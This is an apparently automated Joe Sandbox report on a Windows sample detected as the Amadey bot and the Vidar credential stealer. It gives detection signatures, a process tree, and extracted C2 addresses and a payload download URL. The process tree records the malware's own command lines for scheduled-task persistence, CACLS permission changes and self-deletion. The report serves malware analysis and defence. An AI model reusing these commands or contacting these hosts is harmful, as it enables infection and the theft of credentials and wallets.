Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5GPueTFF2S.exe

Overview

General Information

Sample Name:5GPueTFF2S.exe
Analysis ID:764034
MD5:7d124bc23be85d73b1177143f41b5e72
SHA1:09633b90a0b993fd4dec6d522a1243433fc3ab10
SHA256:04805512d670fb5f37bdf17bf00aae6976650f82c0b4bd342f3506d204f7aea2
Tags:32exetrojan
Infos:

Detection

Amadey, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Amadeys stealer DLL
Malicious sample detected (through community Yara rule)
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Yara detected Vidar stealer
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Overwrites code with function prologues
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Self deletion via cmd or bat file
Tries to harvest and steal ftp login credentials
Machine Learning detection for sample
Tries to evade analysis by execution special instruction (VM detection)
Tries to detect virtualization through RDTSC time measurements
Creates an undocumented autostart registry key
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Entry point lies outside standard sections
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Drops PE files
Uses cacls to modify the permissions of files
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • 5GPueTFF2S.exe (PID: 5848 cmdline: C:\Users\user\Desktop\5GPueTFF2S.exe MD5: 7D124BC23BE85D73B1177143F41B5E72)
    • 75873290272674793137.exe (PID: 6132 cmdline: "C:\ProgramData\75873290272674793137.exe" MD5: 2239A58CC93FD94DC2806CE7F6AF0A0B)
      • gntuud.exe (PID: 5292 cmdline: "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" MD5: 2239A58CC93FD94DC2806CE7F6AF0A0B)
        • schtasks.exe (PID: 5724 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 3644 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\03bd543fce" /P "user:N"&&CACLS "..\03bd543fce" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 2160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 4628 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 3856 cmdline: CACLS "gntuud.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 4760 cmdline: CACLS "gntuud.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cmd.exe (PID: 4384 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 5932 cmdline: CACLS "..\03bd543fce" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 4532 cmdline: CACLS "..\03bd543fce" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
        • rundll32.exe (PID: 5968 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • cmd.exe (PID: 5576 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\5GPueTFF2S.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 3216 cmdline: timeout /t 6 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • gntuud.exe (PID: 5956 cmdline: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe MD5: 2239A58CC93FD94DC2806CE7F6AF0A0B)
  • cleanup

Malware Configuration

Threatname: Amadey

{"C2 url": "85.209.135.109/jg94cVd30f/index.php", "Version": "3.50"}

Threatname: Vidar

{"C2 url": ["http://135.181.10.220:80", "https://t.me/vmt001"], "Botnet": "1760", "Version": "56.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000003.483002099.0000000001165000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
    00000012.00000002.518241260.00000000000A1000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      00000001.00000002.445175041.0000000000F71000.00000020.00000001.01000000.00000006.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            Click to see the 9 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.5GPueTFF2S.exe.a3f900.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              0.3.5GPueTFF2S.exe.b070000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                0.3.5GPueTFF2S.exe.a3f900.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  0.2.5GPueTFF2S.exe.b070000.2.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    0.3.5GPueTFF2S.exe.b070000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      Click to see the 8 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      No Snort rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: http://ripple-wells-2022.net/yzoyoebw6fqrey/nppshell.exeAvira URL Cloud: Label: malware
                      Multi AV Scanner detection for dropped file
                      Source: C:\ProgramData\75873290272674793137.exeReversingLabs: Detection: 35%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\nppshell[1].exeReversingLabs: Detection: 35%
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeReversingLabs: Detection: 35%
                      Machine Learning detection for sample
                      Source: 5GPueTFF2S.exeJoe Sandbox ML: detected
                      Source: 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["http://135.181.10.220:80", "https://t.me/vmt001"], "Botnet": "1760", "Version": "56.1"}
                      Source: 18.2.gntuud.exe.a0000.0.unpackMalware Configuration Extractor: Amadey {"C2 url": "85.209.135.109/jg94cVd30f/index.php", "Version": "3.50"}

                      Compliance

                      barindex
                      Detected unpacking (creates a PE file in dynamic memory)
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeUnpacked PE file: 0.2.5GPueTFF2S.exe.60900000.3.unpack
                      Source: 5GPueTFF2S.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 5GPueTFF2S.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 75873290272674793137.exe, 00000001.00000003.430764953.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, 75873290272674793137.exe.0.dr, gntuud.exe.1.dr
                      Source: Binary string: C:\Yafoca\Rij\Kehiquo soja kafex.pdb source: 5GPueTFF2S.exe
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.4 80Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 85.209.135.109 80Jump to behavior
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: 85.209.135.109/jg94cVd30f/index.php
                      Source: Malware configuration extractorURLs: http://135.181.10.220:80
                      Source: Malware configuration extractorURLs: https://t.me/vmt001
                      Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.423403008.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.430008393.0000000008E30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.181.10.220/
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420608823.00000000009F7000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.423133875.00000000009F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.10.220/1760
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420608823.00000000009F7000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.423133875.00000000009F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.10.220/1760jf.
                      Source: 5GPueTFF2S.exe, 00000000.00000002.423133875.00000000009F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.10.220/update.zip
                      Source: 5GPueTFF2S.exe, 00000000.00000003.385525417.000000000CCC0000.00000040.00000800.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.431582702.000000000B030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.181.10.220:8
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.423403008.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.425200801.0000000002A90000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.432090196.000000000B0A5000.00000002.00000800.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000003.387953405.000000000B070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.181.10.220:80
                      Source: 5GPueTFF2S.exe, 00000000.00000002.422509988.00000000005AC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://135.181.10.220:80/update.zip
                      Source: 5GPueTFF2S.exe, 00000000.00000002.422509988.00000000005AC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://135.181.10.220:80/update.zipb1ef1c57276c118008692-d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963
                      Source: 5GPueTFF2S.exe, 00000000.00000002.425200801.0000000002A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135.181.10.220:801760
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.423403008.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.432090196.000000000B0A5000.00000002.00000800.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000003.387953405.000000000B070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.181.10.220:80https://t.me/vmt001hello2092;open_open
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.423403008.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://135ple-wells-2022.net/yzoyoebw6fqrey/nppshell.exe
                      Source: 75873290272674793137.exe, 00000001.00000003.430764953.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, cred64[1].dll.7.dr, 75873290272674793137.exe.0.dr, gntuud.exe.1.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: 75873290272674793137.exe, 00000001.00000003.430764953.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, cred64[1].dll.7.dr, 75873290272674793137.exe.0.dr, gntuud.exe.1.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: 5GPueTFF2S.exe, 00000000.00000002.424393747.00000000028CA000.00000040.00000800.00020000.00000000.sdmpString found in binary or memory: http://mIkUB7ZDt5qfxou902VyKe64v30McOy.LnrmXFtSK2Pynk6VWBPG5Sf1w0AavRp1BVjmQQUkh2vmJkxEZO5UQQZNHAms9
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420608823.00000000009F7000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.423133875.00000000009F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mikub7zdt5qfxou902vyke64v30mcoy.lnrmxftsk2pynk6vwbpg5s/
                      Source: 75873290272674793137.exe, 00000001.00000003.430764953.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, cred64[1].dll.7.dr, 75873290272674793137.exe.0.dr, gntuud.exe.1.drString found in binary or memory: http://ocsp.sectigo.com0
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.423403008.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ripple-wells-2022.net/yzoyoebw6fqrey/nppshell.exe
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.423403008.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ripple-wells-2022.net/yzoyoebw6fqrey/nppshell.exerO
                      Source: 5GPueTFF2S.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
                      Source: 5GPueTFF2S.exeString found in binary or memory: http://s.symcd.com06
                      Source: 5GPueTFF2S.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                      Source: 5GPueTFF2S.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                      Source: 5GPueTFF2S.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                      Source: 39866407027900499026559352.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: 39866407027900499026559352.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: 5GPueTFF2S.exeString found in binary or memory: https://d.symcb.com/cps0%
                      Source: 5GPueTFF2S.exeString found in binary or memory: https://d.symcb.com/rpa0
                      Source: 5GPueTFF2S.exeString found in binary or memory: https://d.symcb.com/rpa0.
                      Source: 39866407027900499026559352.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: 5GPueTFF2S.exe, 00000000.00000003.395141799.0000000008DF0000.00000004.00000800.00020000.00000000.sdmp, 39866407027900499026559352.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: 39866407027900499026559352.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: 5GPueTFF2S.exe, 00000000.00000003.395141799.0000000008DF0000.00000004.00000800.00020000.00000000.sdmp, 39866407027900499026559352.0.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: 5GPueTFF2S.exe, 00000000.00000003.395141799.0000000008DF0000.00000004.00000800.00020000.00000000.sdmp, 39866407027900499026559352.0.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                      Source: 5GPueTFF2S.exe, 00000000.00000003.395141799.0000000008DF0000.00000004.00000800.00020000.00000000.sdmp, 39866407027900499026559352.0.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                      Source: 5GPueTFF2S.exe, 00000000.00000003.395141799.0000000008DF0000.00000004.00000800.00020000.00000000.sdmp, 39866407027900499026559352.0.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                      Source: 75873290272674793137.exe, 00000001.00000003.430764953.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, cred64[1].dll.7.dr, 75873290272674793137.exe.0.dr, gntuud.exe.1.drString found in binary or memory: https://sectigo.com/CPS0
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.423403008.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.432090196.000000000B0A5000.00000002.00000800.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000003.387953405.000000000B070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/vmt001
                      Source: 5GPueTFF2S.exe, 00000000.00000003.395141799.0000000008DF0000.00000004.00000800.00020000.00000000.sdmp, 39866407027900499026559352.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: 5GPueTFF2S.exe, 00000000.00000002.422854308.00000000009CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 0.2.5GPueTFF2S.exe.a3f900.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                      Source: 0.3.5GPueTFF2S.exe.a3f900.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                      Source: 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                      Source: 00000000.00000002.423403008.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                      Source: Process Memory Space: 5GPueTFF2S.exe PID: 5848, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                      PE file contains section with special chars
                      Source: 75873290272674793137.exe.0.drStatic PE information: section name: lB@dO\ih
                      Source: 75873290272674793137.exe.0.drStatic PE information: section name: Fh?jG[OJ
                      Source: 75873290272674793137.exe.0.drStatic PE information: section name: qNR5:WbS
                      Source: 75873290272674793137.exe.0.drStatic PE information: section name: z?fd8ijJ
                      Source: 75873290272674793137.exe.0.drStatic PE information: section name: CV?7x>JO
                      Source: 75873290272674793137.exe.0.drStatic PE information: section name: dT<:EHzj
                      Source: 75873290272674793137.exe.0.drStatic PE information: section name: @]topACL
                      Source: nppshell[1].exe.0.drStatic PE information: section name: lB@dO\ih
                      Source: nppshell[1].exe.0.drStatic PE information: section name: Fh?jG[OJ
                      Source: nppshell[1].exe.0.drStatic PE information: section name: qNR5:WbS
                      Source: nppshell[1].exe.0.drStatic PE information: section name: z?fd8ijJ
                      Source: nppshell[1].exe.0.drStatic PE information: section name: CV?7x>JO
                      Source: nppshell[1].exe.0.drStatic PE information: section name: dT<:EHzj
                      Source: nppshell[1].exe.0.drStatic PE information: section name: @]topACL
                      Source: gntuud.exe.1.drStatic PE information: section name: lB@dO\ih
                      Source: gntuud.exe.1.drStatic PE information: section name: Fh?jG[OJ
                      Source: gntuud.exe.1.drStatic PE information: section name: qNR5:WbS
                      Source: gntuud.exe.1.drStatic PE information: section name: z?fd8ijJ
                      Source: gntuud.exe.1.drStatic PE information: section name: CV?7x>JO
                      Source: gntuud.exe.1.drStatic PE information: section name: dT<:EHzj
                      Source: gntuud.exe.1.drStatic PE information: section name: @]topACL
                      Source: cred64[1].dll.7.drStatic PE information: section name: f5g\gWe7
                      Source: cred64[1].dll.7.drStatic PE information: section name: zDthL)*@
                      Source: cred64[1].dll.7.drStatic PE information: section name: nb"h!m#Y
                      Source: cred64[1].dll.7.drStatic PE information: section name: $^+<%+dU
                      Source: cred64[1].dll.7.drStatic PE information: section name: Z-),j99t
                      Source: cred64[1].dll.7.drStatic PE information: section name: 8"ikKHD[
                      Source: cred64[1].dll.7.drStatic PE information: section name: k&l<0?<6
                      Source: cred64[1].dll.7.drStatic PE information: section name: n[uZh3ex
                      Source: cred64[1].dll.7.drStatic PE information: section name: Uh%r6i!H
                      Source: cred64.dll.7.drStatic PE information: section name: f5g\gWe7
                      Source: cred64.dll.7.drStatic PE information: section name: zDthL)*@
                      Source: cred64.dll.7.drStatic PE information: section name: nb"h!m#Y
                      Source: cred64.dll.7.drStatic PE information: section name: $^+<%+dU
                      Source: cred64.dll.7.drStatic PE information: section name: Z-),j99t
                      Source: cred64.dll.7.drStatic PE information: section name: 8"ikKHD[
                      Source: cred64.dll.7.drStatic PE information: section name: k&l<0?<6
                      Source: cred64.dll.7.drStatic PE information: section name: n[uZh3ex
                      Source: cred64.dll.7.drStatic PE information: section name: Uh%r6i!H
                      Source: 5GPueTFF2S.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.5GPueTFF2S.exe.a3f900.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                      Source: 0.3.5GPueTFF2S.exe.a3f900.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                      Source: 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                      Source: 00000000.00000002.423403008.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                      Source: Process Memory Space: 5GPueTFF2S.exe PID: 5848, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeCode function: 0_2_00EC35E00_2_00EC35E0
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeCode function: 0_2_00EC81D00_2_00EC81D0
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeCode function: 0_2_00EC7BB00_2_00EC7BB0
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeCode function: 0_2_00EC60910_2_00EC6091
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeCode function: 0_2_00EC42690_2_00EC4269
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeCode function: 0_2_00EC60720_2_00EC6072
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeCode function: 0_2_00EC60230_2_00EC6023
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeCode function: 0_2_00EC603D0_2_00EC603D
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeCode function: 0_2_00ECAF980_2_00ECAF98
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeCode function: 0_2_00EC3F9A0_2_00EC3F9A
                      Source: 5GPueTFF2S.exeStatic PE information: invalid certificate
                      Source: 5GPueTFF2S.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 5GPueTFF2S.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\5GPueTFF2S.exe C:\Users\user\Desktop\5GPueTFF2S.exe
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeProcess created: C:\ProgramData\75873290272674793137.exe "C:\ProgramData\75873290272674793137.exe"
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\5GPueTFF2S.exe" & exit
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
                      Source: C:\ProgramData\75873290272674793137.exeProcess created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe"
